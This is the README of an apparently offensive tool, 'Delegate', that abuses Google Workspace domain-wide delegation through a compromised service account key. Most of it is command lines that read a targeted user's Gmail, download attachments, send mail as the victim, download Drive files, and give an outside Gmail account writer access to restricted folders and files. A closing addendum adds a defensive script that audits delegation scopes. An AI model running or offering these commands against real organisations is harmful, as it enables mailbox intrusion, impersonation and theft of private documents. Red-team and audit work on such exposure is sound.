Delegate

Tool to perform GCP Domain Wide Delegation abuse and access Gmail and Drive data from a compromised Service Account with domain wide delegation permissions configured within Google Workspace.

Delegate tool usage

Gmail usage

List all Gmail emails (limit 200 emails)

python3 delegate.py -k ../sa_key.json -i [email protected] -m gmail -a list

Read Gmail emails (limit 200 emails)

python3 delegate.py -k ../sa_key.json -i [email protected] -m gmail -a read

List Gmail folders (Labels)

python3 delegate.py -k ../sa_key.json -i [email protected] -m gmail -a folders

Download all attachments within the targeted Gmail (limit 200 emails)

python3 delegate.py -k ../sa_key.json -i [email protected] -m gmail -a attachments

Read all emails within a specified folder (Label) (limit 200 emails)

python3 delegate.py -k ../sa_key.json -i [email protected] -m gmail -a read -f DRAFT

Send an email as [email protected] to [email protected] specifying subject and body email content

python3 delegate.py -k ../sa_key.json -i [email protected] -m gmail -a send -r [email protected] -s "Test Message subject" -c "Hello this is a test email"

Drive usage

List all files and folders within the targeted Drive account

python3 delegate.py -k ../sa_key.json -i [email protected] -m drive -a list

List the contents of all folders within the targeted Drive account

python3 delegate.py -k ../sa_key.json -i [email protected] -m drive -a folders

Download a specific file (secret.txt) locally

python3 delegate.py -k ../sa_key.json -i [email protected] -m drive -a download -t secret.txt

Upload files to the user's Drive root folder (My Drive)

python3 delegate.py -k <serviceaccount_key> -m drive -a upload -i <targeted_Workspace_user> -t <localfile> -p <NameInDrive>
python3 delegate.py -k ../sa_key.json -m drive -a upload -i [email protected] -t test.txt -p uploadedTest.txt

Upload files to a specific folder in the user's Drive or to an organizational Shared Drive

python3 delegate.py -k <serviceaccount_key> -m drive -a upload -i <targeted_Workspace_user> -t <localfile> -p <NameInDrive> -f <DriveFolder>
python3 delegate.py -k ../sa_key.json -m drive -a upload -i [email protected] -t test.txt -p uploadedTest.txt -f Restricted_documents

Modify permissions on a specific folder (adds an external Gmail account with Writer permissions over the file/folder)

python3 delegate.py -k ../sa_key.json -i [email protected] -m drive -a permissions -t Restricted_documents -e [email protected]

Modify permissions on a specific file (adds an external Gmail account with Writer permissions over the file/folder)

python3 delegate.py -k ../sa_key.json -i [email protected] -m drive -a permissions -t secrets.txt -e [email protected]
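
Auditing exposure to the access described above

For defenders, this added example (not part of the Delegate project) reviews domain-wide delegation grants and reports which ones carry OAuth scopes that would permit the Gmail and Drive actions listed on this page. The client IDs and the export layout are constructed assumptions; the scope-to-action mapping follows the Gmail and Drive API scope documentation, not the tool's source.

```python
"""Audit domain-wide delegation (DWD) grants for Gmail/Drive exposure."""

P = "https://www.googleapis.com/auth/"
MAIL_FULL = "https://mail.google.com/"

# OAuth scopes that permit each class of action listed on this page.
# (drive.file is left out: it only covers files the app itself created.)
CAPABILITIES = {
    "gmail-read": {MAIL_FULL, P + "gmail.readonly", P + "gmail.modify"},
    "gmail-send": {MAIL_FULL, P + "gmail.modify", P + "gmail.compose",
                   P + "gmail.send"},
    "drive-read": {P + "drive", P + "drive.readonly"},
    "drive-write-share": {P + "drive"},
}

# Constructed sample data (hypothetical client IDs), shaped like the
# client-ID / comma-delimited-scopes pairs an admin enters for DWD.
SAMPLE_GRANTS = [
    {"client_id": "100000000000000000001", "scopes": P + "calendar.readonly"},
    {"client_id": "100000000000000000002",
     "scopes": f"{P}gmail.readonly, {P}drive.readonly"},
    {"client_id": "100000000000000000003", "scopes": f"{MAIL_FULL},{P}drive"},
]


def parse_scopes(raw):
    """Split a comma-delimited scope string, dropping blanks and whitespace."""
    return {s.strip() for s in raw.split(",") if s.strip()}


def audit(grants):
    """Return {client_id: sorted capability names} for grants exposing mail or Drive."""
    findings = {}
    for grant in grants:
        scopes = parse_scopes(grant["scopes"])
        caps = sorted(name for name, allowed in CAPABILITIES.items()
                      if scopes & allowed)
        if caps:
            findings[grant["client_id"]] = caps
    return findings


if __name__ == "__main__":
    for client_id, caps in audit(SAMPLE_GRANTS).items():
        print(f"{client_id}: a leaked key for this client allows {', '.join(caps)}")
```

Any client flagged with gmail-send or drive-write-share can act as, not just read from, every user it may impersonate, so those grants and the keys behind them deserve the tightest review.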